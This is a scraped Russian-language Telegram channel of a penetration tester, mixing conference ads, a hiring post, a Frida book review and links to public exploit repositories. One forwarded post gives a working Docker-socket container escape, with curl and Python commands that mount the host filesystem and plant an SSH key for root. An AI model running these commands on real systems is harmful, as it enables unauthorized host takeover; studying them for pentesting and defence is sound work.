YAH – Telegram
6.77K subscribers
244 photos
19 videos
29 files
512 links
Yet another hacker

Я Егор Богомолов, с 2015 в кибербезе, основатель проектов Singleton Security и CyberEd.

На канале разбираю новости из мира кибербезопасности через призму личного опыта, делюсь инсайтами, шучу шутки.

По вопросам - @Marta_Irinos
Download Telegram
Forwarded from ZeroNights
Открыта ранняя продажа билетов на ZeroNights 2022

ZeroNights – это квинтэссенция того, чем ИБ-сообщество живет целый год. И мы в 11-й раз соберем всех неравнодушных к прикладным аспектам отрасли.

🗓 Дата
23 июня 2022

📍Место
Санкт-Петербург, Севкабель Порт

💥Программа
На ZeroNights будут представлены тщательно отобранные доклады по самым разным темам информационной безопасности.

В этом году массу интересного можно будет услышать на отдельной секции Defensive Track, посвященной практической стороне ИБ в контексте защиты и обеспечения безопасности ресурсов и приложений.

Спикеры любимой многими секции Web Village расскажут о современных атаках на веб-приложения. Желающие прокачать свои скиллы и овладеть новыми навыками смогут сделать это в рамках воркшопов и Hardware Zone.

Активностей с ценными призами для победителей будет еще больше!

До 1 марта у вас есть возможность приобрести билеты на конференцию со скидкой! Поспешите приобрести билет по цене прошлого года.

Купить билет со скидкой
Красота!
Forwarded from Android Guards
Про Frida уже написано столько, что хватит на 3 “войны и мира”, но часто это какие-то прикладные статьи или туториалы начального уровня. За границами этих туториалов начинается остервенелое изучение документации, которая, ИМХО, не так хороша как могла бы быть. Тем интереснее книга, которую я после долгих раздумий все же решился прочитать и не пожалел - Beginning Frida. У меня вообще есть практика периодически изучать материалы начального уровня чтобы закрыть возможные пробелы в знаниях.

Книга в меньше степени про использование Frida в Android и в большей про то как устроен инструмент, как на нем решать различные задачи и про экосистему вокруг. Тем и ценна.

Автор сильно упростил мне задачу написав какие главы нужно читать обязательно, а какие можно пропустить. Я прочитал все и теперь полностью согласен с его рекомендациями:

Глава 1: Настройка среды. Будет полезна тем, кто никогда про Frida не слышал или давно хотел попробовать, но руки не доходили. Остальные там ничего интересного не найдут.

Глава 2: Базовые приемы работы. Смело пропускаем если уже трогали тетю Фриду ;)

Глава 3: Работа с frida-trace. Нашел для себя несколько интересных вещей касательно модулей.

Глава 4: Углубленная работа с frida-trace. Мне показалась интересной. Можно пробежаться глазами и поискать интересные практики для себя.

Глава 5: Переход от трейсинга к сталкингу. Есть полезная инфа про frida-stalker и немного про frida-gadget

Глава 6: Разработка собственных инструментов. Новичкам будет полезно, джедаям - вряд-ли.

Глава 7: Разбор компонета frida-server. Есть интересное, в т.ч. запуск по сети.

Глава 8: Введение в NativeFunction. Довольно полезная глава. Есть интересные практики.

Глава 9: Frida и Android. Новичкам обязательна к прочтению. А также всем тем, кто ловил странные проблемы с Frida. У кого и так все хорошо - не читайте.

Глава 10: Работа с библиотечными функциями и памятью. Полезная глава. Есть хорошие примеры работы с адресами функций и поиску значений в памяти.

Глава 11: Как писать обертки на Python. Тоже хорошая глава. Отлично раскрывает концепцию RPC, которую я редко вижу в скриптах, а при этом она довольно полезная.

Глава 12: Решение пары OWASP-овских crackme на Android. Новички, вам сюда. Джедаи, проходите мимо.

Глава 13: Как открыть Telegram в Objection. Будет полезна все тем же новичкам и людям не знакомым с Objection.

Глава 14: Небольшое описание Codeshare. А вы знали, что там можно зарегистрироваться? 😀

Что касается самого текста, то он читается довольно легко. Я пробежался буквально за пару вечеров. Ссылку на торренты не прикладываю. Вы же хакеры, сами найдете 😎
👍1
Дорогие друзья, всем привет!

У меня есть мое любимое дело: анализ защищенности и тестирование на проникновение. Кто-то знает, кто-то не знает, но во всяком случае уточняю;)

Достаточно давно я решил, что хочу делать это по-своему. Со своей командой, где только интересные и понятные мне люди, с теми заказчиками, с которыми я хочу работать и с теми заказами, с которыми я хочу работать. Я начал свое дело -> singleton-security.ru . Сейчас мы уже серьезно выросли с того времени, когда я был один, но все еще являемся маленькой командой. Ко мне присоединились интересные и умные люди, мне помогали и помогают мои друзья. 

Но в это же время, я все больше участвую в более высокоуровневых процессах, хоть и стараюсь успевать уделить время практике, которая действительно мне нравится. Ключевое, что теперь я горю желанием развивать мою команду, моих коллег и друзей. Я ищу только тех, кто также горит этим делом, только тех, кто заинтересован и дальше жить этим, и только тех, кто тратит на это свое время в удовольствие.

Сейчас мы хотим видеть в команде новых толковых специалистов по безопасности веб-приложений. Тех, кто умеет находить уязвимости в вебе, покрывать приложения проверками, читать код на многих языках программирования. 

Наша команда ищет спецов, которые уже чувствуют себя "мидлами", а также тех кто является уверенным джуном в этом деле и планирует расти.

Для тех кто хочет присоединиться к нашей команде, предлагаем следующее. 

Для того чтобы пройти отбор нужно будет:

1. Прислать свое резюме.
2. Указать ожидаемые условия работы. (Фулл-тайм и парт-тайм (4 часа в день) рассматриваются).
3. Если вы подходите под наши ожидания по скиллам, мы дадим вам тестовое задание на анализ кода. Если вы его проходите - вы в деле.

Примерные условия для кандидатов:

1. 100% удаленная работа, с периодическими встречами в оффлайне и с постоянным общением в онлайне.
2. Зарплатные ожидания сугубо от кандидата. Вопрос сколько вы стоите - это на самом вопрос, сколько вы умеете. Умеете на 50 тыс. - будет 50, умеете на 500 - будет 500. Думаю понятно, что мы не Яндекс, не Positive и не Kaspersky, но умения спецов и их время мы ценить умеем.
3. Свобода работы, графика и пр. главное это результат, главное это ответственность.

P.S. Для тех, кто только начинает, хочет научиться чему-то и подключиться потом, у нас есть список требований которые нужно выполнить, чтобы подключиться к нам как стажер, с рассмотрением кандидата в переход на начинающего специалиста. Несколько месяцев вам предстоит проходить задачи на открытых платформах, писать код, разбираться в технологиях. Раз в месяц мы будем созваниваться и обсуждать ваши успехи. Как только станет понятно что вы все сделали, сами, при этом разобрались в сделанном - мы пригласим вас вступить в наши ряды.

Контакт: jack@singleton-security.ru (@empty_jack)
Forwarded from Positive Events
👥 Давайте чаще видеться!

Последняя кибербитва The Standoff была в ноябре, следующая пройдёт в мае, так что есть время и повод собраться вместе.

🎙 Мы планируем серию митапов The Standoff Talks, посвящённую Offensive Security и The Standoff. Можно рассказать про свой командный опыт на битве или просто поделиться интересными и забавными находками в сфере пентеста.

Требования к докладам:
▪️ офлайн-выступление в Москве на 15–90 минут;
▪️ тема связана с The Standoff или Offensive Security;
▪️ будет плюсом демо, визуалка или интерактив, где слушатели сами смогут что-то опробовать на практике.

🔵🔴 Полезно поучаствовать специалистам Red/Blue Team, пентестерам и тем, кто уже играл в The Standoff или только планирует.

⚡️Первый митап пройдёт 17 марта.

Ждём ваши заявки до 28 февраля → forms.gle/nkR14xdjU56uNvtL9
Forwarded from frozen@rivens.life ()
Митап - lfi.key
105.4 MB
Йо. Недавно наткнулся на пост Егора Богомолова (@empty_jack) в котором говорилось об эксплуатации LFI через фичу Nginx body buffering. И так меня впечатлила эта бага, что я решил сделать полноценный ресерч на тему подобных чейнов. На удивление, их оказалось и вправду много и я потратил достаточно времени и сил на то, чтоб найти самые интересные из них и сделать полноценный информативный доклад.

Плюс ко всему, нашел способ с помощью которого можно крафтить валидные пейлоады для удаления стопперов. Проверял только в случае с чейном из лабы, возможно с другими не сработает (по идее должен)

Написал лабы, выступил с презентацией.
Скачать лабы можно тут:
https://github.com/rive-n/php-lfi-race-labs

Там сразу есть эксплойты и ридмиха с тем, что за баги/ какой чейн.

Преза в посте
🔥16👍2
Forwarded from Just Security
Как за несколько секунд просканировать внешний периметр на наличие открытых портов и уязвимостей?

Недавно коллега рассказал о новом инструменте Nrich, который позволяет очень быстро проанализировать список IP-адресов на наличие общеизвестных уязвимостей (баннерный поиск) и открытых сервисов.

Конечно же инструмент представляет из себя пассивный сканер, который использует API Shodan.

Nrich проверил пулл адресов из маски /24 за 5 секунд:

➜  ~ wc -l scope.txt
255 scope.txt

time nrich scope.txt > /dev/null
nrich scope.txt > /dev/null 0.07s user 0.04s system 2% cpu 4.913 total
🔥11👍3
Приключения ждут.
🤯3
Forwarded from Codeby
Чрезвычайно срочная инфа от НКЦКИ.

1) В течении 24ч все потребители оборудования cisco на территории России будут отключены от смарт аккаунтов.

2) в течении суток будет инициировано проверка лицензирования со стороны серверов cisco.

Рекомендуют: на выходе инфраструктуры в сеть интернет поставить жёсткий access-list с запретом трафика на адрес tools.cisco.com
Если это сделать, то будет отложенный период от 30 до 90 дней, когда функционал оборудования сохранится
🔥7👍2
Forwarded from Positive Events
🚨 Долгожданные новости о майской кибербитве

Для синих и красных команд The Standoff начнётся 16 мая, а закончится 19 мая — 4 дня с перерывами на сон (как вы просили 😉). Три команды пригласим в ЦМТ, остальные — онлайн.

Защитникам будут противостоять 15 команд хакеров. Топ-5 по итогам ноябрьской кибербитвы мы пригласим напрямую, минуя отборочный тур. Напомним этих героев:

🔺 Codeby&NitroTeam
🔺 True0xA3
🔺 SPbCTF
🔺 Invuls
🔺 Bulba Hackers

📊 Оставшиеся 10 слотов могут занять команды из любой точки мира. Отбирать команды мы будем по «резюме». Если у вас есть опыт в Offensive Security и пентесте, точно подавайте заявку. Можно писать на русском или английском, как вам комфортнее.

👉 Для русскоговорящих команд форма регистрации — forms.gle/zPvrpadk9VfRWYBHA

👉 Red teams registration for participating in The Standoff — forms.gle/Vg1BH1Duj3hrDVaZ8

Регистрация открыта до 3 апреля. Жюри рассмотрит все заявки, мы свяжемся с капитанами до 15 апреля и опубликуем список приглашённых команд. Удачи! 💪
👍4
Годная подборка
Forwarded from frozen@rivens.life (Deep Learning bot)
Контейнеры и виртуализация.

Виртуализация:

Как именно работает виртуализация:
https://www.ibm.com/ru-ru/cloud/learn/virtual-machines

Видео из ссылки выше о том, как работают гипервизоры и какого типа бывают:
https://www.youtube.com/watch?v=FZR0rG3HKIk

Архитектурное сравнение контейнеров и виртуальных машин:
https://docs.microsoft.com/ru-ru/virtualization/windowscontainers/about/containers-vs-vm

Контейнеры:

Что за ядро используется внутри Docker images:
https://stackoverflow.com/questions/32841982/how-can-docker-run-distros-with-different-kernels

Принципы работы докера:
https://stackoverflow.com/questions/16047306/how-is-docker-different-from-a-virtual-machine

Использование Union Mount / AUFS в докере:
https://jessicagreben.medium.com/digging-into-docker-layers-c22f948ed612

Официальная документация к AUFS / OverlayFS:
https://docs.docker.com/storage/storagedriver/aufs-driver/
https://docs.docker.com/storage/storagedriver/overlayfs-driver/
👍8🔥1👏1
Свеженький LPE в Linux: CVE-2022-0995 через heap out-of-bounds write.

Ссылка на эксплоит: https://github.com/Bonfee/CVE-2022-0995
👍1
Как говорится… “Только без паники!”

https://github.com/BobTheShoplifter/Spring4Shell-POC

Возможно! Возможно… Есть новая страшная бага в Spring. Но судя по комментам, как будто опасность пытаются завышать. Будем следить за деталями.
Вот и пруфы. Вроде не выглядит суперпопулярным кейсом, но могу ошибаться.
👍3
Forwarded from frozen@rivens.life ()
В продолжение темы:
https://github.com/rive-n/SpringShell/tree/master

Приложение было уже готово ночью, но эксплойт не работал, так как суть заключалась в том, что было необходимо использовать Tomcat:
"Exploitation requires an endpoint with DataBinder enabled (e.g. a POST request that decodes data from the request body automatically) and depends heavily on the servlet container for the application. For example, when Spring is deployed to Apache Tomcat, the WebAppClassLoader is accessible, which allows an attacker to call getters and setters to ultimately write a malicious JSP file to disk. However, if Spring is deployed using the Embedded Tomcat Servlet Container the classloader is a LaunchedURLClassLoader which has limited access."

Цитата отсюда: https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html?m=1
👍1
Немного интересностей из моей жизни.

Кто-то в курсе того, чем я занимаюсь, кто-то нет. Многим может быть полезно узнать, а мне может быть полезно это рассказать.

Помимо хакинга я заинтересован образованием в своей любимой сфере, в сфере кибербезопасности. Я давно принимаю участие в подобных активностях. Так вот, немного новостей об этом…

```
Школа HackerU вышла из состава российской Ed- и HR-Tech группы компаний Humantek, входящей в международную технологическую группу Prytek.

Новое название компании — Образовательный центр по кибербезопасности CyberEd (cyber-ed.ru).

Новым управляющим партнёром Образовательного центра по кибербезопасности CyberEd стал Егор Богомолов — предприниматель отрасли информационной безопасности, эксперт по кибербезопасности с опытом работы в крупнейших ИБ компаниях РФ, этичный хакер.
```

Link: https://vc.ru/u/446473-cybered/391787-shkola-it-i-kiberbezopasnosti-hackeru-stanovitsya-obrazovatelnym-centrom-po-kiberbezopasnosti-cybered

Если ищите, где получить знания и умения для сферы кибербезопасности, то не найдете в России другой компании, где было бы объединено столько экспертов высокого уровня, делящихся знаниями в режиме открытого общения и поддержки учащихся.

Я рад и горжусь тем, что, так долго участвуя в работе компании в разных формах партнерства, приложил руку к развитию тысяч специалистов за последние несколько лет и теперь могу с еще большими возможностями влиять на эту сферу. Также, я понимаю на каком уровне сейчас находятся образовательные продукты в сфере компьютерной безопасности в России и вижу сколько нам еще предстоит попытаться сделать.

Надеюсь на светлое будущее этой отрасли и с каждым годом, увеличивая возможность влияния на ее успех, радуюсь тому как она процветает. Надеюсь и вас касается или коснется развитие этой сферы! (В хорошем смысле ;D )
🔥28👍10🤯5
Media is too big
VIEW IN TELEGRAM
#реклама

Каков сейчас рынок услуг ИБ? Просто посмотрите на это.

Длинные цепочки субподрядчиков, грабительские комиссии, непрозрачное ценообразование и сомнительные гарантии качества. Альтернатива?

Третья Сторона - первый маркетплейс услуг ИБ в России!
Работай напрямую с проверенными исполнителями, без посредников, с максимальной прозрачностью.

Ссылка на сайт
🔥9👍4🤯3
Forwarded from RedTeam brazzers
Наш уважаемый подписчик @C0ldheim на днях выступил на встрече DC7342 с докладом "PWN & Defense Dynamic Routing Protocols". Тема раскрыта очень хорошо и очень глубоко. ИМХО: данный доклад обязателен к просмотру всем, для кого слова "внутренний пентест" не пустой звук. https://www.youtube.com/watch?v=tzjFcIk-zfE
Также у автора есть репозитории с инструментами для атак на OSPF и EIGRP:

https://github.com/C0ldheim/EIGRPWN
http://github.com/C0ldheim/OSPFMD5Crack (особенно полезно)
👍1
Forwarded from Нарыл
Если вы оказались в docker контейнере, в который проброшен Docker API socket, то это может позволить выбраться из контейнера на хостовую машину. Для этого, например, можно запустить привилегированный контейнер, подмонтировать в него хостовую ФС и дальше, например, вписать свой ключ в /root/.ssh/authorized_keys:
docker run --privileged -v /:/mnt ubuntu echo key >> /mnt/root/.ssh/authorized_key
s

Это все понятно, но вот сегодня я в очередной раз оказался в контейнере с прокинутым docker.sock, но без docker CLI. Ситуация вполне возможна если вы пробрались в условный Gitlab используете docker shared runner и не знаете в каком из доступных образов есть docker cli, при этом прямого доступа в интернет нет.

Значит придется взаимодействовать с докеровским unix socket на прямую. Docker API Socket принимает запросы по протоколу HTTP (docs). А значит можно использовать curl ... --unix-socket /var/run/docker.sock.

Составил для себя список альтернативных docker команд:

docker image:

curl --unix-socket /var/run/docker.sock http://localhost/images/json | jq '.[].RepoTags'


docker ps:

curl --unix-socket /var/run/docker.sock http://localhost/containers/json | jq '.[] | "\(.Id) \(.Image)"'


docker pull:

curl --unix-socket /var/run/docker.sock -X POST 'http://localhost/images/create?fromImage=busybox&tag=latest'


Создать привилегированный контейнер, в котором будет выполнена команда - (docker create):

curl --unix-socket /var/run/docker.sock -X POST 'http://localhost/containers/create' --data '{"Cmd":["/bin/bash","-c","echo key > /mnt/root/.ssh/authorized_keys"],"Image":"ubuntu","HostConfig":{"Binds":["/:/mnt/"],"RestartPolicy":{"Privileged":true}},"Tty":true}' -H "Content-Type: application/json"


docker start:

curl --unix-socket /var/run/docker.sock -X POST http://localhost/containers/<id>/start


docker logs:

curl --unix-socket /var/run/docker.sock 'http://localhost/containers/<id>/logs?stderr=1&stdout=1&tail=all' --output -


docker rm:

curl --unix-socket /var/run/docker.sock -X DELETE http://localhost/containers/<id>


Тут важно что нельзя одним запросом создать и запустить контейнер, как делает docker run. Под капотом он выполняет два HTTP запроса. Первый запрос возвращает айдишник, который нужно использовать в последующем.

Также, если curl тоже нету, то можно обращаться с unix socket через python, примерно так:

sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect('/var/run/docker.sock')
sock.send('''GET /containers/json HTTP/1.1
Host: /var/run/docker.sock

''')
sock.recv(1024)
👍9🔥5
Forwarded from OFFZONE
⚓️ Соскучились? Ждем вас на OFFZONE Meetup!

Привет! Мы давненько ничего не проводили очно.

Поэтому решили не дожидаться августовской встречи на OFFZONE и устроить митап в этом месяце.

Если вы тоже скучали по живому общению в тусовке безопасников, приходите на OFFZONE Meetup.

Мы подготовили 5 докладов: часть из них о технической начинке OFFZONE, а другая — ресерчи.

Митап бесплатный, нужна только регистрация.

🔴 Мы откроем запись и поделимся программой в следующий понедельник, 11 апреля в 16:00. Мест всего 60, так что stay tuned!

Дата и время: 22 апреля, 18:00–21:30
Место: офис BI.ZONE
Адрес: Москва, ул. Ольховская, д. 4, корп. 1, этаж 1.
🔥4👏1